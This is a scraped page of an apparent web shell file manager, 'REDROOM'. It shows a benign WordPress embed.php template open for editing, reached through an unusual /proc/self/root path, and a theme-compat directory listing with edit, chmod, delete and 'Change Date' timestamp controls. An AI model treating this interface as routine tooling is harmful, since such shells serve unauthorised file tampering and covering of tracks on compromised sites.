REDROOM
PHP 8.2.30
Path:
Logout
Edit File
Size: 481 B
Close
//proc/self/root/proc/thread-self/root/var/softaculous/sitepad/editor/site-inc/theme-compat/embed.php
Text
Base64
<?php /** * Contains the post embed base template * * When a post is embedded in an iframe, this file is used to create the output * if the active theme does not include an embed.php template. * * @package WordPress * @subpackage oEmbed * @since 4.4.0 */ get_header( 'embed' ); if ( have_posts() ) : while ( have_posts() ) : the_post(); get_template_part( 'embed', 'content' ); endwhile; else : get_template_part( 'embed', '404' ); endif; get_footer( 'embed' );
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 9
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
comments.php
2.07 KB
lrw-r--r--
2026-04-20 08:20:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
embed-404.php
968 B
lrw-r--r--
2026-04-20 08:20:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
embed-content.php
3.37 KB
lrw-r--r--
2026-04-20 08:20:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
embed.php
481 B
lrw-r--r--
2026-04-20 08:20:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
footer-embed.php
438 B
lrw-r--r--
2026-04-20 08:20:34
Edit
Download
Rename
Chmod
Change Date
Delete
footer.php
1.04 KB
lrw-r--r--
2026-04-20 08:20:34
Edit
Download
Rename
Chmod
Change Date
Delete
header-embed.php
704 B
lrw-r--r--
2026-04-20 08:20:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
header.php
1.88 KB
lrw-r--r--
2026-04-20 08:20:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
sidebar.php
4.16 KB
lrw-r--r--
2026-04-20 08:20:34
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).